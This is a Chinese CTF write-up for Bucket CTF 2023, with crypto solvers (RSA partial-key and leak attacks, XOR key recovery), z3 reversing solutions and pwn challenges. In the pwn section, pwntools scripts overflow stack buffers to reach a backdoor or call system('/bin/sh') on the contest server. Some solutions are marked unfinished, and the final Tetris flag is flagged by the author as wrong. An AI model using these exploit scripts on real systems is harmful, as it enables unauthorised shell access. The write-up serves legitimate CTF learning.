[Bucket CTF 2023]

怎么感觉这比赛越来越难了呢。

Crypto

TBDLCG

唯一的提示就是题目的名字,对LCG来说它一定会有规律的。登录远程后,它会生成两个0-8的数,猜对得1分,不对对方得1分,赢了就行。试了两次发现,它真有规律,毕竟是密码签到,送分。

┌──(kali㉿kali)-[~/pwndbg]
└─$ nc 213.133.103.186 6915
You are playing a game of table tennis against Cogsworth64's AI bot.
The bot is only able to serve the ball, because Cogsworth64 disabled .
The bot will send a certain spin (represented by a number 0-8) and location (represented by a number 0-8) at each point. If you can guess the spin and location, you win the point. If you can't, the bot wins the point.
The first player to win 20 points wins the game. Try not to lose.

Your score: 0
Bot's score: 0
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 5 and location was 2
Your score: 0
Bot's score: 1
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 2 and location was 2
Your score: 0
Bot's score: 2
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 2 and location was 2
Your score: 0
Bot's score: 3
What is your guess for location?0
What is your guess for spin?0
You lose the point!
The bot's spin was 2 and location was 2
Your score: 0
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 1
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 2
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 3
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
Your score: 4
Bot's score: 4
What is your guess for location?2
What is your guess for spin?2
You win the point!
You win the game!
b'bucket{#1_victory_royale_86f2b88341d8d}\n'

rotund bits 未完成

给了一堆数,不明白怎么旋转。

b'\xb3\xd7\x1b\x6b\x2c\xbc\x07 \xea\xd3\xfc\x5f\xe6\x37\xa0 \xa0\xff\x6c\x53\x37\xd7\xee \x9b\xba\x5b\xa4\x4c\xd7\xd7 \xbc\x9e\x6b\x51\xa4\x4b\xe0 \xf6\xc0\x9b\x3c\xf0\x68\x1d \xa6\xe7\x94\xdf\x63\xd9\xe2 \xf2\xf0\x1a\x66\x6a\xa2\x1f \x9e\x40\x1b\xb4\x5e\x35\xd2 \xd8\x2e\x40\xaa\xb5\xee\x6e \xd4\xf0\x2e\x3a\x1b\x0e\x99 \xb1\x16\xb4\x37\x17\xa4\x48 \xb0\xc1\x9a\xfa\x05\x28\xf4 \xbe\x49\xdd\xdb\x90\xa9\xc9 \xb1\xd4\xdd\x2b\x3a\xd2\x63 \xc3\xe3\x63\x69\x6c\x52 \xfe\xf3\xe1\x57\xdc\x57\xa1 \xc4\x62\x02\xec\xe9\xd5\x22 \xb7\x33\x17\x1b\xf2\x50\x2a \xf1\x9a\x06\x36\x18\xc3 \xeb\xd3\x3f\x9e\xc0\xfe\x17 \xe6\x59\x0c\x4c\xa0\xe2\xa5 \xae\x29\x8f\x8d\x8c\xdf\xea \xb5\xcd\x6e\x48\x3e\xab \xbb\xe5\x06\xd7\x33\xc5 \xba\x3e\xdf\xb9\xc6\xbb\xfb \xc8\xe1\xda\x15\xad\xf2\x91 \xcc\x92\x5d\x1e\x9d\x91 \xdc\xe6\x3e\x0b\x5c\xf5 \xfd\x6c\xd1\x57\x5b\xea\x41 \xa6\xf6\x5e\x56\xe2\x5a\x4f \xdf\x37\xc9\xba\xcd\x2e \xcb\x23\x31\x5b\x1a\xf3 \xaf\x30\x93\xf7\xbb\x17 \x93\x98\xff\xf2\xf4\x4c\xb7'

Psychology Random

感觉是难题不难,简单题不简单。

给了加密程序是用4字节为key进行异或加密,key每用一次会加一个数。

seedKey = [] # set of 4 human random numbers between 0 and 255 inclusive
addKey =  humanRandomGenerator(1,10) # human random number between 1 and 10 inclusive
for i in range(4):
    seedKey.append(humanRandomGenerator(0, 255))

with open("flag.txt", "rb") as f:
    flag = f.read()

encryptedFlag = bytearray()
for i in range(len(flag)):
    encryptedFlag.append(flag[i] ^ seedKey[i%4])
    seedKey[i%4] = (seedKey[i%4] + addKey) % 255

#b'\xea\x95\\>\x8a\xca!(\xc8\xe38\x0e\xca\xb8+H\xcb\xbey\x03\xa3\xac@\x0f\xa2\xaaG\x16\xba\x89\x19\xa4\xac\x88U\xea\x90\x91\\\xe7\x87\x9a\xe1\xf5\x95#\xfe\xcf\xd7e\xf7\xc1\x9bc\xb8\xd7im\xbf\xd4ir\xcf\xcfgO\xc2\xad;Y\xdb\xeaq@\xda\xbfOT\xb0\xbc\x1eb\x9d\xb7^:\xf0\x82[3\xbe\x9e,8\xb0\xd4%0\xc5\x95\xee\x97H+\xa5\xcb*;\xfc\x9d?.\xc3\x89#\x0c\x89d+\x19\xdd(9\x03\x97bF\x0chsM\x12hp\x11\xe8z\x04\x0c\xe85D\xf2\xf1r\x12\xe8\xf5\x03X\xe0\xd2F)\xf4\xc8E.\xf1\xde\x18:\xca\x97V!\xdf\x9e#*\xd6\xab9\x16\xdb\xa0t\x1a\xb3\xb6(\x14\xa6\xae\x03\x0c\xa6\x8e\x07_\xbf\x86P\xf2\xb5\x8aW\xec\x80\x9b\x17\xe7\x98\x94\xea\xf5\xd2f\xe3\xcf\x94e\xe7\xdddv\xb6\x90\x7f\x7f\x81\xd5}H\xc6\xd96\\\xc7\xa0=G\xdf\xabLS\xce\xa7\x0bQ\xa1\xacW(\xeb\x8e_k\xb1\x87.!\xb0\x8b"+\x81\x82\'\x0f\x89\xdd!\x08\xcej)\x1c\xd5h\x06\x16\x95`\x03\x13ji_\xa3^M\x0c\xe3\x7fI\x0b\xf4uV\xaa\xb8T^\xe8\xecB\x1d\xf0\xcfH"\xf2\xce@\'\xd6\x94X7\xca\xd200\xdf\xac9@\xd6\xbb4G\xd3\xb1<\x0b\xe5\xa06\x01\xa4\xfe\x05\x13\xbd\x93\x04\xe0\xae\x85\x1b\xe4\xc1\x92\x15\xf5\xc8\x99\xee\xf9\x9dk\xfd\xe6\xda)\xf1\xc8\x990\xe0\xc8%s\xf1\x94bq\xd1\x9bpJ\xc2\xa6oO\xc7\xe9@]\x9a\xb1XJ\xa4\xb6Ca\xb8\xacY+\xaa\x96Na\xf6\xbb!v\xaf\x96(2\x89\x977\n\x8f"/\x02\x81`\x14\x1b\x97wG\x16teN\xf0iy\x10\xa7`C\\\xe8dI\xf2\xe0x]\xfe\xf0]\x1a\xf0\xd0@$\xfc\x8aC=\xfa\xc2M&\xc9\xd63v\xcb\xd05}\xd5\xa8=\x13\xde\xbf&K\xa3\xb63\x07\xbd\xfb\x0c\x0c\xa2\xc2\x0b\xe4\xba\x80\x02\xf4\xb7\x9f\x16\xae\x95\x85\x10\xf6\x89\x8d\xf5\xb2\xd3O\xad\xc2\x96~\xfb\x8auu\xf5\xc5)o\xcd\x98cJ\xc8\xcdr\t\xd1\xa8>Q\xc5\xb9LT\xd2\xb1\x0cw\xe5\xacA*\xb8\x87\x1a?\xb6\x9f$!\xbb\x9ch#\x84\x96=\x12\xc8\x9f1\x07\xcf`2\x1d\xd6y\x0c\x13\xddX\x04\x0e%Z\x1c\xe3iN\x1c\xf83}\xe9\xff\x7fC\xa9\xb9hY\xae\xc9\\\x12\xb5\xee\x0f7\xf9\xc8Z)\xc0\xc1\x1d<\xc4\x9c%>\xdc\xaa8\x12\xd1\xa5Q\xe5\xf7JB\xf7\xc0\x0c.\xfc\xcaA\'\xc9\xdc]p\xc6\xdb."\xda\xe011\xc0\xebo\x04\xd2\xaav\x1b\xa6\xf56\x1d\xa5\xabD\x03\xbe\x96K\xf6\xb1\x86\x1e\xa8\xab\x99\x0b\xe6\x90\x9d\xa0\xe1\x85e\xf5\xf8\x82b\xfc\x84\x82a\xe0\xd9#p\xf8\xc7i}\xd7\xd0~M\x8a\xb4yA\xd4\xb4?H\xd7\xbb\x08\x18\xe8\xbcYW\xe6\xaaQ4\xb4\xc3Y(\xa7\x9eb#\xb2\x82!>\x91\xd4p0\x80c?\x08\x82c~8\xd9.6\x1f\x9fbL:c}\x1d\xa5bEZ\xcdpG\xe8\xe0hX\xe7\xf4\x02Y\xe1\xc5\ty\xff\xc6Q(\xfe\xc6V!\x84\xf7W0'

这个很明显,4个字节key之间没有任何关系,所以不用爆破完整的32位,只需要一个个爆破8位就行。

由于ASCII字符高位都是0,从密文看每36次就会高会一次循环(一半高位0一半高位1)所以addKey=7(256/36),然后根据循环起点高位1的数量确定大概的范围,肉眼可见基本没有乱的可以确定key的值,很幸运第1个是I,第2个是空格,这种情况大概率是"I am..."

#根据高位变化规律,确定增量7 (256/36) 起点范围
b = [enc[i] for i in range(0,len(enc),4)]
[234, 138, 200, 202, 203, 163, 162, 186, 172, 144, 135, 149, 215, 155, 
105, 105, 103, 59, 113, 79, 30, 94, 91, 44, 37, 60, 35, 12, 27, 79, 4, 13, 
229, 229, 250, 185, 203, 135, 142, 197, 217, 170, 190, 182, 173, 172, 136, 140, 212, 140, 
35, 122, 117, 56, 63, 67, 67, 70, 72, 55, 57, 51, 56, 59, 22, 31, 22, 8, 
244, 237, 246, 243, 241, 136, 198, 223, 149, 163, 188, 130, 167, 236, 147, 171, 174, 173, 
46, 39, 46, 103, 115, 81, 10, 72, 24, 91, 37, 40, 53, 41, 14, 8, 6, 18, 9, 
169, 232, 254, 186, 209, 193, 198, 197, 212, 189, 191, 183, 170, 133, 131, 156, 133, 220, 
112, 109, 102, 120, 76, 9, 14, 71, 72, 42, 63, 35, 43, 57, 70, 77, 17, 12, 
242, 232, 224, 244, 241, 202, 223, 214, 219, 179, 166, 166, 191, 181, 128, 152, 210, 148, 
100, 127, 125, 54, 61, 76, 11, 87, 95, 46, 34, 39, 33, 41, 6, 3, 95, 12, 11, 
170, 232, 240, 242, 214, 202, 223, 214, 211, 229, 164, 189, 174, 193, 200, 157, 218, 153, 37, 98, 112, 111, 64, 88, 67, 89, 78, 33, 40, 55, 47, 20, 71, 78, 16, 92, 242, 254, 240, 252, 250, 201, 203, 213, 222, 163, 189, 162, 186, 183, 149, 137, 211, 150, 117, 41, 99, 114, 62, 76, 12, 65, 26, 36, 104, 61, 49, 50, 12, 4, 28, 28, 233, 169, 174, 181, 249, 192, 196, 220, 209, 219, 181, 190, 244, 251, 150, 201, 149, 150, 144, 108, 99, 52, 111, 65, 72, 81, 81, 83, 17, 39, 38, 40, 17, 6, 0, 23, 15, 211, 229, 247, 252, 201, 198, 218, 192, 210, 166, 165, 190, 177, 171, 144, 133, 130, 130, 35, 105, 126, 121, 63, 8, 89, 81, 89, 98, 33, 112, 63, 126, 54, 76, 29, 90, 232, 231, 225, 255, 254, 132]
for i1 in range(0x80-7*7, 0x80-7*7+10):
    c = [((i1+7*i)^b[i])&0xff for i in range(len(b))]
    print(i1, bytes(c))

根据大概数再通过结果修正,确实是I am 

seedKey = [163,181,61,83] #根据显示结果修正

m = []
for i in range(len(enc)):
    m.append(enc[i] ^ seedKey[i%4])
    seedKey[i%4] = (seedKey[i%4] + addKey) % 255

print(bytes(m))
'''
b'I am very sorry to let you know we are unable to offer you admission to Stanford. This decision in no way diminishes your application, which we know was completed with thoughtfulness and care. We were inspired by the hopes and dreams your application represents. We were humbled by the talent, commitment, bucket{sT1LL_crYPt0gRapHiCAlLy_s3cUR3...}, and heart you bring to your academics, extracurricular activities, work, and family responsibilities. Simply put, we wish we had more space in the first-year class. At every step in our process, from the moment we open an application to its eventual presentation in the admission committee, we bring the highest level of consideration to our decisions. Ultimately, these difficult decisions are made with conviction and clarity, and we do not conduct an appeal process. We recommend visiting our page of frequently asked questions for answers about our admission process. I also want to share an article I wrote several years ago for the Los Angeles Times. In it, I reflect on admission decisions in the context of educational journeys that encompass a lifetime. Thank you for applying to Stanford. We enjoyed learning about you, and we know you will thrive wherever your education takes you. With very best wishes, Richard H. Shaw Dean of Admission and Financial Aid'
'''

engma 未完成

古老的二战时期的加密方式,可我还是不会,网上的程序能搜到的也看不懂。

I found an old enigma machine and was messing around with it. I put a secret into it but forgot it. I remember some of the settings and have the output. Model: M3 Reflector: B Rotors: I II III Plugboard: AT BS DE FM IR KN LZ OW PV XY Output: rvvrw dxyfi cctev o

Wrap the solution in bucket{} and remove spaces.

search 0-3

RSA题n非常小,我都想爆力yafu了,结了p的前108位

from Crypto.Util.number import getPrime, inverse, bytes_to_long
from string import ascii_letters, digits
from random import choice

m = open("flag.txt", "rb").read()
p = getPrime(128)
q = getPrime(128)
n = p * q
e = 65537
l = (p-1)*(q-1)
d = inverse(e, l)

m = pow(bytes_to_long(m), e, n)
print(m)
print(n)

p = "{0:b}".format(p)
for i in range(0,108):
    print(p[i], end="")

直接coppersmith法

c = 13239107902510482241468033185859380635553681091807776989153122088094692164374
n = 70091368740163465220150076054753303343809342873669932172778520609948272787957
pa = 0b111100100011010111101101101111010111110001101001000111001000000100110110000110011010111100111110011111110110
P. = PolynomialRing(Zmod(n))
f = pa*2**20 + x 
v = f.monic().small_roots(X=2^20, beta=0.4)

p = int(v[0])
q = n//p 
d = inverse_mod(e, (p-1)*(q-1))
m = pow(c,d,n)
#m = 10368895352824186465612502311017709829844509137436946597498767623293
bytes.fromhex(hex(m)[2:])
b'bucket{m3m0ry_L3Aks_4R3_bAD}'

第2题是泄露(p-2)*(q-2)

from Crypto.Util.number import getPrime, inverse, bytes_to_long
from string import ascii_letters, digits
from random import choice

m = open("flag.txt", "rb").read()
p = getPrime(128)
q = getPrime(128)
n = p * q
e = 65537
l = (p-1)*(q-1)
d = inverse(e, l)

m = pow(bytes_to_long(m), e, n)
print(m)
print(n)
leak = (p-2)*(q-2)
print(leak)

显然这东西算来算去就出来p+q了

c = 20921046497068379266125077526806962898582128837995542884725206089966377378921
n = 48840190338286448297079476326071154759298697427813544346418151575212559759237
leak = 48840190338286448297079476326071154758406784045723310119131706040174602802837
e = 65537

from z3 import *
from gmpy2 import invert 
from Crypto.Util.number import *

p,q = Int('p'),Int('q')
s = Solver()
s.add(p*q == n)
s.add(p+q == (n+4-leak)//2)
s.check()
v = s.model()

p = 252628846929635323275223893760360594943
q = 193327844115481790367998873758617883259
phi = (p-1)*(q-1)
d = invert(e,phi)
m = pow(c,d,n)
long_to_bytes(m)

第3题是泄露d求p

from Crypto.Util.number import getPrime, inverse, bytes_to_long, isPrime
from string import ascii_letters, digits
from random import choice

p = bytes_to_long(open("flag.txt", "rb").read())
m = 0
while not isPrime(p):
    p += 1
    m += 1
q = getPrime(len(bin(p)))
n = p * q
e = 65537
l = (p-1)*(q-1)
d = inverse(e, l)

m = pow(m, e, n)
print(m)
print(n)
print(d)

根据ed分解有模板的

c = 222994213978863330553922294717307292644132816052441853882119473623484428577112619863162149325375659637202223440222380339302067418973630
n = 334760575723542774705270019437269620423492572977096137042514415148155744817190838223911316211781496693341274968244658582355112978166371
d = 101530981943892148447695991216482418254692187208229548438196118679509954784936455455719628630318436454487703910570562418605156238653073
m = pow(c,d,n)
m = 0xe

from gmpy2 import gcd
import random 

def e_dn(e_d,n):
    k=e_d-1
    while True:
        g= random.randint(2,n-1)
        t=k
        while True:
            if t%2!=0:
                break
            t=t//2
            x=pow(g,t,n)
            if x > 1 and gcd(x-1, n) > 1:
                p=gcd(x-1,n)
                q=n//p
                return p,q

p,q = e_dn(e*d,n)
long_to_bytes(p-0xe)
#bucket{sw1tCH1nG_D1dNT_W0rK}

第4题这个头回见

n=p^2

from Crypto.Util.number import getPrime, inverse, bytes_to_long, isPrime
from string import ascii_letters, digits
from random import choice


m = bytes_to_long(open("flag.txt", "rb").read())
p = getPrime(128)
q = getPrime(128)
n = p * p
e = 65537
l = (p-1)*(p-1)
d = inverse(e, l)

m = pow(m, e, n)
print(m)
print(n)

虽然很容易求p但显然得到的不是flag,所以有个问题,flag比n大,经过两次取crt,然后用n1*n2作模就够大了。

c1 = 47797682737892115953484395180518349264285435110589415752726386351563180397052
n1 = 53864074128388087701868621546438818337217026484044077665023474433395091270761
c2 = 23778649669106866245954474032238747691063562599599963306072366934189019821037
n2 = 30185375866517447300635112066453153581171712702736030398246225895796204467721

me = crt([c1,c2],[n1,n2])
#me = 1315219050916415178472726952023611679667569911911680490293416891601335959710605129296605584509235799345693878394241999540884629338622342728012202283121154

p = iroot(n1,2)[0]
q = iroot(n2,2)[0]
d = invert(e, p*(p-1)*q*(q-1))
m = pow(me,d,n1*n2)
print(long_to_bytes(m))

#bucket{th4_F1N4l_L3v3l_0f_3nCRypT10N}

PWN

Parrot 未完成

签到就坑,是个盲pwn题,输入‘%p’*n会出数,显然是个格式化字符串漏洞。经过测试得到栈的情况,下午以后这个地址就不再变,显然是ALSR关掉了,也就是地址都知道。

偏移 栈地址 长度
8 0x7fffffffebb0 输入值  0x40
19 0x7fffffffec08 libc_start_main_ret
23 0x7fffffffed18
26 0x7fffffffed18

1,有两个可修改的指针;

2,返回地址直接是libc_start_main所以直接这是在main里运行的,没有函数;

3,libc版本是libc-2.35 有点高啊

4,输入只有64字节(短)

试了one_gadget没成功,可能需要改one的条件,但本地没有调试猜条件很困难。

starting place

签到,12个字节后是command,直接输入就行

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char input_buf[12]; // [esp+0h] [ebp-28h] BYREF
  char command[20]; // [esp+Ch] [ebp-1Ch] BYREF
  int *p_argc; // [esp+20h] [ebp-8h]

  p_argc = &argc;
  strcpy(command, "ls");
  puts("Hi! would you like see the current directory?");
  read(0, input_buf, 0x1Cu);
  if ( !strcmp(input_buf, "no\n") )
  {
    puts("ok");
    exit(0);
  }
  puts("Ok \n");
  system(command);
  return 0;
}

never call

有溢出有后门,ALSR是关的,所以地址全知道,直接溢出

from pwn import *

#p = process('./shell1')
p = remote('213.133.103.186', 6795)
context(arch='i386', log_level='debug')

#0xffcdb000 0xffcfc000 rwxp      [stack]
p.sendlineafter(b"Enter your name: ", b'A'*62+ p32(0x12ab+0x56555000)) #"Enter your name: "

p.interactive()

shell,shell harder

没get到这两个题的出题点,由于没有了直接用的后门,需要自己调起

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  puts("Starting program");
  getMessage();
  printf("back.");
  printf("Exiting!");
  exit(0);
}
void getMessage()
{
  char string[50]; // [esp+Eh] [ebp-3Ah] BYREF

  printf("Enter your name: ");
  gets(string);
  printf("Hello, %s\n", string);
}
void __cdecl printFlag(char *command)
{
  printf(command);
  system(command);
}

但是有个小问题,如果直接输入bin/sh的话在printf的时候会覆盖掉,不过ALSR未开的情况下libc地址也是固定的。libc里的/bin/sh可以直接用。

两题用同一程序即可。

from pwn import *

#p = process('./shell2')
p = remote('213.133.103.186', 7007)
context(arch='i386', log_level='debug')
elf = ELF('./shell2')
elf.address = 0x56555000
libc_base = 0xf7d8a000
bin_sh = libc_base + 0x1b90f5

p.sendlineafter(b"Enter your name: ", b'\x00'.ljust(62, b'\x00')+ flat(elf.sym['printFlag'],ret, bin_sh) ) # 
p.recvline()

p.interactive()

REV

就做俩题,感觉很难

Apps

略,flag在原码里

Tetris

z3题,不过有个小坑,直接算不出结果,不完全约束。

    i = 0;
    for (byte b3 = 0; b3 < 8; b3++)
      i += arrayOfInt[b3]; 
    if (i == 877)
      b2 = 1; 
    if (arrayOfInt[13] == arrayOfInt[16] && arrayOfInt[13] == arrayOfInt[21])      bool1 = true; 
    if (arrayOfInt[19] == 7 * (arrayOfInt[12] - arrayOfInt[13]) / 2)      bool2 = true; 
    if (arrayOfInt[13] + arrayOfInt[12] == arrayOfInt[16] + arrayOfInt[15])      bool3 = true; 
    if (arrayOfInt[7] + arrayOfInt[8] + arrayOfInt[9] - 51 == 2 * arrayOfInt[9])      bool4 = true; 
    if (arrayOfInt[8] == arrayOfInt[20])      bool5 = true; 
    if (arrayOfInt[10] + arrayOfInt[11] - arrayOfInt[17] - arrayOfInt[18] == arrayOfInt[10] - arrayOfInt[17])bool6 = true; 
    if (arrayOfInt[20] == 51)      bool11 = true; 
    if (arrayOfInt[22] + arrayOfInt[23] == arrayOfInt[22] * 2)      bool7 = true; 
    if (arrayOfInt[9] - arrayOfInt[17] == 40)      bool12 = true; 
    if (arrayOfInt[10] - arrayOfInt[17] - 6 == 0)      bool13 = true; 
    if (arrayOfInt[2] - arrayOfInt[11] == 50)      bool10 = true; 
    if (arrayOfInt[24] - arrayOfInt[12] == 10)      bool14 = true; 
    if (arrayOfInt[13] + arrayOfInt[15] == 2 * arrayOfInt[14])      bool8 = true; 
    if (arrayOfInt[23] == arrayOfInt[22] && 3 * arrayOfInt[23] == arrayOfInt[2])      bool9 = true; 
    String str2 = "";
    for (byte b4 = 0; b4 < arrayOfInt.length; b4++)
      str2 = str2 + (char)arrayOfInt[b4]; 
    if (b2 != 0 && bool1 && bool2 && bool3 && bool4 && bool5 && bool6 && bool7 && bool8 && bool9 && bool11 && bool12 && bool13 && bool10 && bool14)
      return "correct flag: " + str2; 
    return "wrong flag: " + str2;

先用z3解出个初步结果

from z3 import *

s = Solver()
a = [BitVec(f'a_{i}',8) for i in range(25)]

for i in range(25):
    s.add(a[i]>=0x20)
    s.add(a[i]<=0x7f)
head = b'bucket{'
for i,v in enumerate(head):
    s.add(a[i] == v)
s.add(a[24] == ord('}'))    
s.add(a[0]+a[1]+a[2]+a[3]+a[4]+a[5]+a[6]+a[7] == 877)
s.add(a[13] == a[16])
s.add(a[13] == a[21])
s.add(a[19]*2 == 7*(a[12]-a[13]))
s.add(a[13]+a[12] == a[15]+a[16])
s.add(a[7]+a[8]-51 == a[9])
s.add(a[8] == a[20])
s.add(a[11] == a[18])
s.add(a[20] == 51)
s.add(a[22] == a[23])
s.add(a[9]-a[17] == 40)
s.add(a[10]-a[17] == 6)
s.add(a[2]-a[11] == 50)
s.add(a[24]-a[12] == 10)
s.add(a[13]+a[15] == 2*a[14])
s.add(a[23] == a[22])
s.add(a[23]*3 == a[2])
s.check()
d = s.model()

flag = ''
for i in range(25):
    flag+= chr(d[a[i]].as_long())

print(flag)

flag = list(b'bucket{t3tR1sinsiL1#3i!!}')

剩下不能完全确定 13,16,21,19,14 需要从13这爆破一下(后边都由13推出)

flag = list(b'bucket{t3tR1sinsiL1#3i!!}')
for i in range(0x21,0x7f,2):
    flag[13]= i 
    flag[16]= i
    flag[21]= i 
    flag[19]= (flag[12]-flag[13])*7//2
    if not 0x20<=flag[19]<=0x7f:
        continue 
    flag[14]= (flag[13]+flag[15])//2
    if not 0x20<=flag[14]<=0x7f:
        continue
    print(bytes(flag))

#bucket{t3tR1s_is_L1F3_!!} ?不对

你可能感兴趣的:(CTF,crypto,CTF,pwn,CTF,reverse,CTF)